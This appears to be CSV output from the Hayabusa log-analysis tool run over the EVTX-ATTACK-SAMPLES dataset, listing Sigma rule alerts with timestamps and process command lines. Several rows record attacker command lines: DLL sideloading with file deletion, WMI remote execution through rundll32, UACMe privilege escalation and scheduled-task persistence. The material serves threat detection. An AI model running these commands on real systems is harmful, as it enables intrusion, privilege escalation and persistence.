2020-10-17 20:43:40.902 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\explorer.exe""  :  Path: C:\Windows\SysWOW64\explorer.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
2020-10-17 20:43:40.903 +09:00,MSEDGEWIN10,8,high,CACTUSTORCH Remote Thread Creation,,rules/sigma/create_remote_thread/sysmon_cactustorch.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
2020-10-17 20:43:45.120 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\IEUser\AppData\Roaming\WINWORD.exe""  :  Path: C:\Users\IEUser\AppData\Roaming\WINWORD.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
2020-10-17 20:43:45.120 +09:00,MSEDGEWIN10,1,high,MS Office Product Spawning Exe in User Dir,,rules/sigma/process_creation/win_office_spawn_exe_from_users_directory.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
2020-10-17 20:43:49.229 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c ping 127.0.0.1&&del del /F /Q /A:H ""C:\Users\IEUser\AppData\Roaming\wwlib.dll""  :  Path: C:\Windows\SysWOW64\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
2020-10-17 20:43:49.229 +09:00,MSEDGEWIN10,1,high,Microsoft Office Product Spawning Windows Shell,,rules/sigma/process_creation/win_office_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
2020-10-17 20:50:02.661 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{ACA8FE61-4C38-4216-A89C-9F88343DF21F}-GoogleUpdateSetup.exe  :  URL: http://r3---sn-5hnedn7z.gvt1.com/edgedl/release2/update2/HvaldRNSrX7_feOQD9wvGQ_1.3.36.32/GoogleUpdateSetup.exe?cms_redirect=yes&mh=Aq&mip=213.127.67.142&mm=28&mn=sn-5hnedn7z&ms=nvh&mt=1602935359&mv=m&mvi=3&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-17 21:32:08.987 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{8B60600B-E6B4-4083-99F3-D3A4CFB95796}-86.0.4240.75_85.0.4183.121_chrome_updater.exe  :  URL: http://r2---sn-5hne6nsr.gvt1.com/edgedl/release2/chrome/W_YanCvPLKRFNu-eN8kKOw_86.0.4240.75/86.0.4240.75_85.0.4183.121_chrome_updater.exe?cms_redirect=yes&mh=ps&mip=213.127.67.142&mm=28&mn=sn-5hne6nsr&ms=nvh&mt=1602937879&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-17 21:32:11.026 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-17 21:32:11.318 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-17 21:32:11.574 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: SetupBinary  :  URL: https://oneclient.sfx.ms/Win/Prod/20.169.0823.0006/OneDriveSetup.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-17 21:33:56.406 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-18 01:27:08.081 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: calc.exe  :  Path: C:\Windows\SysWOW64\calc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\ProgramData\Intel\CV.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx
2020-10-18 01:27:08.734 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.2008.2.0_x64__8wekyb3d8bbwe\Calculator.exe"" -ServerName:App.AppXsm3pg4n7er43kdh1qp4e79f1j7am68r8.mca  :  Path: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.2008.2.0_x64__8wekyb3d8bbwe\Calculator.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ?",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx
2020-10-18 01:27:10.464 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\RuntimeBroker.exe -Embedding  :  Path: C:\Windows\System32\RuntimeBroker.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx
2020-10-18 07:37:52.809 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-18 07:37:52.892 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-18 07:37:52.956 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-18 07:37:52.991 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-18 07:37:53.047 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-18 07:37:53.111 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-18 07:37:53.169 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-18 07:37:53.230 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-18 07:37:53.417 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-18 07:37:53.527 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-18 07:37:53.571 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-18 07:37:53.664 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-18 07:37:53.771 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-18 07:37:53.807 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-18 07:37:53.867 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-18 07:37:53.928 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-18 07:53:05.436 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\Administrator  :  Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
2020-10-18 07:53:05.436 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
2020-10-18 07:53:05.676 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe /Q /c cd  1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\Administrator  :  Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
2020-10-18 07:53:05.676 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
2020-10-18 07:53:05.777 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\Administrator  :  Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
2020-10-18 07:53:05.777 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx
2020-10-20 20:50:54.810 +09:00,DESKTOP-NTSSLJD,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059.001,technique_name=PowerShell  :  Command: ""C:\Users\den\Source\Repos\UACME\Source\Akagi\output\x64\Release\Akagi64.exe"" 64  :  Path: C:\Users\den\Source\Repos\UACME\Source\Akagi\output\x64\Release\Akagi64.exe  :  User: DESKTOP-NTSSLJD\den  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
2020-10-20 20:50:54.810 +09:00,DESKTOP-NTSSLJD,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
2020-10-20 20:50:55.450 +09:00,DESKTOP-NTSSLJD,11,high,UAC Bypass Using IEInstal - File,,rules/sigma/file_event/sysmon_uac_bypass_ieinstal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
2020-10-20 20:50:56.490 +09:00,DESKTOP-NTSSLJD,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1036,technique_name=Masquerading  :  Command: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe  :  Path: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe  :  User: DESKTOP-NTSSLJD\den  :  Parent Command: ""C:\Program Files\Internet Explorer\IEInstal.exe"" -Embedding",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
2020-10-20 20:50:56.490 +09:00,DESKTOP-NTSSLJD,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
2020-10-20 20:50:56.490 +09:00,DESKTOP-NTSSLJD,1,high,UAC Bypass Using IEInstal - Process,,rules/sigma/process_creation/win_uac_bypass_ieinstal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
2020-10-20 20:50:56.569 +09:00,DESKTOP-NTSSLJD,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059.003,technique_name=Windows Command Shell  :  Command: ""C:\Windows\system32\cmd.exe""  :  Path: C:\Windows\System32\cmd.exe  :  User: DESKTOP-NTSSLJD\den  :  Parent Command: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx
2020-10-21 07:33:02.063 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\wermgr.exe  :  Path: C:\Windows\System32\wermgr.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: rundll32.exe  c:\temp\winfire.dll,DllRegisterServer",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx
2020-10-21 07:33:02.063 +09:00,MSEDGEWIN10,1,critical,Trickbot Malware Activity,,rules/sigma/process_creation/win_malware_trickbot_wermgr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx
2020-10-21 07:33:02.064 +09:00,MSEDGEWIN10,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx
2020-10-21 07:35:26.755 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding  :  Path: C:\Windows\System32\wbem\WmiPrvSE.exe  :  User: NT AUTHORITY\NETWORK SERVICE  :  Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx
2020-10-24 06:55:59.769 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{2015B2D1-1706-42F6-8C0E-8BEECB408D48}-86.0.4240.111_86.0.4240.75_chrome_updater.exe  :  URL: http://r2---sn-5hnekn7z.gvt1.com/edgedl/release2/chrome/E4_ltUMmNI-KvJYPRyaXng_86.0.4240.111/86.0.4240.111_86.0.4240.75_chrome_updater.exe?cms_redirect=yes&mh=3q&mip=213.127.65.23&mm=28&mn=sn-5hnekn7z&ms=nvh&mt=1603490058&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-24 06:57:29.217 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding  :  Path: C:\Windows\System32\wbem\WmiPrvSE.exe  :  User: NT AUTHORITY\NETWORK SERVICE  :  Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
2020-10-24 06:57:36.014 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" conf3234.dll f8753 d948  :  Path: C:\Windows\SysWOW64\rundll32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: c:\Users\Public\test.tmp ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
2020-10-24 06:57:36.399 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe""  /C schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers  :  Path: C:\Windows\SysWOW64\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\rundll32.exe"" conf3234.dll f8753 d948",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: schtasks  /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers  :  Path: C:\Windows\SysWOW64\schtasks.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe""  /C schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,high,Suspicius Add Task From User AppData Temp,,rules/sigma/process_creation/win_pc_susp_schtasks_user_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
2020-10-24 06:58:17.176 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222  :  Path: C:\Windows\System32\rundll32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ?",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
2020-10-24 06:58:17.176 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
2020-10-24 06:58:17.543 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222  :  Path: C:\Windows\SysWOW64\rundll32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
2020-10-24 06:58:17.543 +09:00,MSEDGEWIN10,1,high,Suspicious Call by Ordinal,,rules/sigma/process_creation/win_susp_rundll32_by_ordinal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
2020-10-24 06:58:21.695 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222  :  Path: C:\Windows\SysWOW64\rundll32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
2020-10-24 06:58:22.066 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" DATAUS~1.DLL f8755 4624665222 rd  :  Path: C:\Windows\SysWOW64\rundll32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx
2020-10-24 22:15:50.672 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download  :  URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-24 22:53:41.949 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1amaWj.img?w=100&h=100&m=6&tilesize=medium&x=1912&y=840&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-24 22:53:43.173 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161342140454_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-10-24 23:25:16.281 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
